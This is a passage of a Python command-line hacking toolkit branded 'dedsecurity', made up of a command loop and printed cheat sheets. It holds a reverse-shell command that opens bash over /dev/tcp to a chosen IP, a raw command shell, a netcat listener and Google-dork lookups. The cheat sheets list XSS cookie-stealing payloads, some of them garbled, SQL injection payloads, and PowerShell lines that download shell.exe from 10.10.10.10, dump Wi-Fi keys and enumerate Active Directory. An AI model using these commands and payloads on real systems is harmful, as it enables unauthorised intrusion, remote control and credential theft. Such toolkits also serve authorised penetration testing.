113 | ishell = input("> ")
114 | print("\033[34m[*] \033[mCommand: "+ishell)
115 | print(os.popen(ishell).read())
116 |
117 | def pdb():
118 | import pdb
119 | pdb.set_trace()
120 |
121 | def dpc():
122 | import main
123 | if platform.system() == 'Linux':
124 | os.system("python3 main.py")
125 | elif platform.system() == 'Windows':
126 | os.system("python main.py")
127 |
128 | def speciport():
129 | p = input("Website/Ip: ")
130 | if platform.system() == 'Linux':
131 | os.system("python3 network/speciport.py "+p)
132 | elif platform.system() == 'Windows':
133 | os.system("python network/speciport.py "+p)
134 |
135 | def conwhois(dom):
136 | try:
137 | info = whois.whois(dom)
138 | print(info)
139 | except Exception as e:
140 | print("Error:", e)
141 |
142 |
143 | print("Type 'help' to show commands.")
144 |
145 | while True:
146 | i = input("\033[36mdedsecurity> \033[m")
147 |
148 | if i == "exit":
149 | break
150 | elif i == "clear":
151 | os.system("clear")
152 | elif i == "shell":
153 | shell()
154 | elif i == "cls":
155 | os.system("cls")
156 | elif i == "help":
157 | help()
158 | elif i == "robots":
159 | v = input("Website: ")
160 | robots = 'http://'+v+'/robots.txt'
161 | info = requests.get(robots)
162 | print(info.text)
163 | elif i == "speciport":
164 | speciport()
165 | elif i == "curl":
166 | c = input("Website[example:https://google.com]: ")
167 | os.system('deno run --allow-net network/curl.ts '+c)
168 | elif i == "banner":
169 | if platform.system() == 'Linux':
170 | os.system("python3 network/banner_grabbing.py")
171 | elif platform.system() == 'Windows':
172 | os.system('python network/banner_grabbing.py')
173 | elif i == "portscan":
174 | if platform.system() == 'Linux':
175 | os.system('python3 network/scannernmap.py')
176 | elif platform.system() == 'Windows':
177 | os.system('python network/scannernmap.py')
178 | elif i == "wifi":
179 | if platform.system() == 'Linux':
180 | os.system('python3 network/wifi.pyw')
181 | elif platform.system() == 'Windows':
182 | os.system('python network/wifi.pyw')
183 | elif i == "subdomain":
184 | subdomain()
185 | elif i == "whois":
186 | domain = input("Website: ")
187 | conwhois(domain)
188 | elif i == "geoip":
189 | g = input("Website/Ip: ")
190 | geoip = 'https://api.hackertarget.com/geoip/?q='+g
191 | info = requests.get(geoip)
192 | print(info.text)
193 | elif i == "traceroute":
194 | traceroute()
195 | elif i == "ping":
196 | pi = input("Website/Ip: ")
197 | os.system("ping "+pi)
198 | elif i == "google":
199 | url = input("Website: ")
200 | webbrowser.open_new_tab(google_hacking + 'site:'+url)
201 | elif i == "exploitdb":
202 | webbrowser.open_new_tab('https://www.exploit-db.com/google-hacking-database')
203 | elif i == "login":
204 | lo = input("Website: ")
205 | webbrowser.open_new_tab(google_hacking + 'inurl:"/login.htm" site:'+lo)
206 | elif i == "ondevice":
207 | on = input("Website: ")
208 | webbrowser.open_new_tab(google_hacking + 'site:'+on+' /tcpipv4.htm')
209 | elif i == "indexof":
210 | index = input("Website: ")
211 | webbrowser.open_new_tab(google_hacking + 'intitle: "index of" site:'+index)
212 | elif i == "dmarc":
213 | dmarc = input("Url: ")
214 | os.system("host -t txt _dmarc."+dmarc)
215 | elif i == "dirb":
216 | urldirb = input("Url: ")
217 | os.system("dirb "+urldirb)
218 | elif i == "listeningport":
219 | ip = input("Ip: ")
220 | port = input("Port: ")
221 | os.system("sudo nc -l "+ip+" -p "+port+" -v")
222 | elif i == "dedsecurity":
223 | webbrowser.open_new_tab('https://www.dedsecurity.com')
224 | elif i == "reverseshell":
225 | ip = input("Ip: ")
226 | port = input("Port: ")
227 | os.system("bash -c 'exec bash -i &>/dev/tcp/"+ip+"/"+port+" <&1'")
228 | elif i == "xss":
229 | print("""
230 | Data grabber for XSS
231 |
232 | Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
233 |
234 |
235 |
236 |
237 |
238 |
239 | XSS in HTML/Applications
240 |
241 | Basic Payload
242 |
243 |
244 | ipt>alert('XSS')ipt>
246 | ">
247 | ">
248 |
249 | Img tag payload
250 |
251 | 
252 |
254 |
255 | )
256 | ">
257 | ">
258 |
259 | XSS in SVG (short)
260 |
261 |
262 |
263 |
264 |
265 |
266 | Bypass word blacklist with code evaluation
267 |
268 | eval('ale'+'rt(0)');
269 | Function('ale'+'rt(1)')();
270 | new Function`alert`6``;
271 | setTimeout('ale'+'rt(2)');
272 | setInterval('ale'+'rt(10)');
273 | Set.constructor('ale'+'rt(13)')();
274 | Set.constructor`alert(14)```;
275 | """)
276 | elif i == "sqlinjection":
277 | print("""
278 | Generic SQL Injection Payloads
279 |
280 | ' or '
281 | -- or #
282 | ' OR '1
283 | ' OR 1 -- -
284 | OR "" = "
285 | " OR 1 = 1 -- -"
286 | ' OR '' = '
287 | '='
288 | 'LIKE'
289 | '=0--+
290 | OR 1=1
291 | ' OR 'x'='x
292 | ' AND id IS NULL; --
293 | '''''''''''''UNION SELECT '2
294 |
295 | Time-Based
296 |
297 | ,(select * from (select(sleep(10)))a)
298 | %2c(select%20*%20from%20(select(sleep(10)))a)
299 | ';WAITFOR DELAY '0:0:30'--
300 | Generic Error Based Payloads
301 | OR 1=1
302 | OR 1=1#
303 | OR x=y#
304 | OR 1=1--
305 | OR x=x--
306 | OR 3409=3409 AND ('pytW' LIKE 'pytW
307 | HAVING 1=1
308 | HAVING 1=1#
309 | HAVING 1=0--
310 | AND 1=1--
311 | AND 1=1 AND '%'='
312 | WHERE 1=1 AND 1=0--
313 | %' AND 8310=8310 AND '%'='
314 |
315 | Authentication Based Payloads
316 |
317 | ' or ''-'
318 | ' or '' '
319 | ' or ''&'
320 | ' or ''^'
321 | ' or ''*'
322 | or true--
323 | " or true--
324 | ' or true--
325 | ") or true--
326 | ') or true--
327 | admin') or ('1'='1'--
328 | admin') or ('1'='1'#
329 | admin') or ('1'='1'/
330 |
331 | Order by and UNION Based Payloads
332 |
333 | 1' ORDER BY 1--+
334 | 1' ORDER BY 2--+
335 | 1' ORDER BY 3--+
336 | 1' ORDER BY 1,2--+
337 | 1' ORDER BY 1,2,3--+
338 | 1' GROUP BY 1,2,--+
339 | 1' GROUP BY 1,2,3--+
340 | ' GROUP BY columnnames having 1=1 --
341 | -1' UNION SELECT 1,2,3--+
342 | ' UNION SELECT sum(columnname ) from tablename --
343 | -1 UNION SELECT 1 INTO @,@
344 | -1 UNION SELECT 1 INTO @,@,@
345 | 1 AND (SELECT * FROM Users) = 1
346 | ' AND MID(VERSION(),1,1) = '5';
347 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
348 | """)
349 | elif i == "encode":
350 | msg = input("msg: ")
351 | encode(msg)
352 | print(encode(msg))
353 | elif i == "decode":
354 | msgde = input("msg: ")
355 | decode(msgde)
356 | print(decode(msgde))
357 | elif i == "powershellhandy":
358 | print("""
359 | System enumeration
360 |
361 | systeminfo
362 | Get-WmiObject Win32_ComputerSystem
363 | echo "$env:COMPUTERNAME.$env:USERDNSDOMAIN"
364 | # List Security patches
365 | Get-Hotfix -description "Security update"
366 | wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn
367 | # Environment Variables
368 | Get-ChildItem Env: | ft Key,Value
369 | (over cmd.exe)
370 | set
371 |
372 | HTTP download (wget like)
373 |
374 | Invoke-WebRequest "http://10.10.10.10/shell.exe" -OutFile "shell.exe"
375 | # Cmd compatible
376 | certutil -urlcache -f http://10.10.10.10/shell.exe shell.exe
377 |
378 | WLAN enumeration
379 |
380 | netsh wlan show profiles
381 | netsh wlan show profile name="PROFILE-NAME" key=clear
382 |
383 | Active Directory enumeration
384 |
385 | Domain enumeration
386 | Get-NetDomain
387 | # List Forest Domains
388 | Get-NetForestDomain
389 | # Domain SID
390 | Get-DomainSID
391 | # Domain Policy
392 | Get-DomainPolicy
393 | # Domain Organizational Units
394 | Get-NetOU
395 | # List trusted Domains
396 | Get-NetDomainTrust
397 |
398 | GPO enumeration
399 |
400 | # GPO applied to the machine
401 | Get-NetGPO -ComputerName computername.domain.com
402 |
403 | Password enumeration
404 |
405 | # Last Password Set date
406 | Get-UserProperty –Properties pwdlastset
407 | # Description of User object
408 | Find-UserField -SearchField Description –SearchTerm “pass”
409 | Computer enumeration
410 | # List Computers of the Domain
411 |
412 | Get-NetComputer
413 |
414 | # List Pingable Hosts
415 | Get-NetComputer -Ping
416 | # List Windows 7 Ultimate Computers
417 | Get-NetComputer –OperatingSystem "Windows 7 Ultimate"
418 |
419 | Admin groups and account enumeration
420 |
421 | # List Domain Admin members
422 | Get-NetGroupMember -GroupName "Domain Admins"
423 | # List Admin Groups
424 | Get-NetGroup *admin*
425 | # List Local Admins [need Administrative rights]
426 | Get-NetLocalGroup –ComputerName PCNAME-001
427 | # Get groups of user [need Administrative rights]
428 | Get-NetGroup –UserName "username"
429 |
430 | ACL enumeration
431 |
432 | # User ACL
433 | Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs
434 | # GPO modifications rights
435 | Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
436 | # Password reset rights
437 | Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"
438 | """)
439 | elif i == "webserver":
440 | webserver()
441 | print("Serving HTTP on :: port 8080")
442 | elif i == "pdb":
443 | pdb()
444 | elif i == "dpc":
445 | dpc()
446 |
447 |
--------------------------------------------------------------------------------